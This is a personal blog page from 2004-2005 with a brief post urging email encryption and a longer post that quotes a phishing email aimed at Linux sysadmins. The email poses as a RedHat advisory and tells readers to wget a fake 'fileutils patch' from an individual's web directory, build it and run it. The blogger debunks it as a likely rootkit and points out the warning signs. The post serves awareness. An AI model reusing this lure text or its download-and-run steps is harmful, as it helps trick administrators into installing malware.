Sun, 13 Nov 2005

A Meme That Isn't A Waste of Your Time

Sven-S. Porst challenged me to talk about email encryption (PGP/ S/MIME, or something), and to suggest to 5 others that they do the same… I realize that you aren’t all Mac folk, but it’s reasonably straightforward in Thunderbird, Outlook, Evolution, and several other mailers, so hopefully you’ll give it a whirl.

First, if you’re using Apple Mail, there’s a really friendly guide to getting it set up. Otherwise, the Wikipedia entries for S/MIME and PGP might be worth checking.

:: 21:19
:: /tech/computers/security | [+]
::Comments (0)

Sat, 23 Oct 2004

Redhat Phish

Looks like phishers are even going after sysadmins. Very interesting… I got the following email last night, sent to my webmaster account:


logo

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

  • First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
  • Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
  • cd fileutils-1.0.6.patch
  • make
  • ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.


Very credible looking, except for a few little niggles:

  • Note that the “patch” (almost certainly a rootkit) is linked to an individual user’s (“joeio”) account
  • I seriously doubt that Redhat would be relaying through a random machine in Taiwan:
    Received: from mail.forcartex.com.tw (unknown [211.22.18.59]) by samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39 for daddy@freeke.org; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)

Anyway, I thought this was notable — I’ve seen phishes like this targeted at Windows users, but this is the first I’ve seen specifically targeting ‘nix admins. One would assume that they just collected a bunch of webmaster addresses, figuring (probably correctly) that a fair number of those boxes would be running Redhat. The email shows an attention to detail -- the HTML links to Redhat's real logo, linked from a Redhat server, and they even ran their HTML through Tidy!

Let's be careful out there!

:: 23:55
:: /tech/computers/security | [+]
::Comments (0)




Fain would I climb, yet fear I to fall.
— Sir Walter Raleigh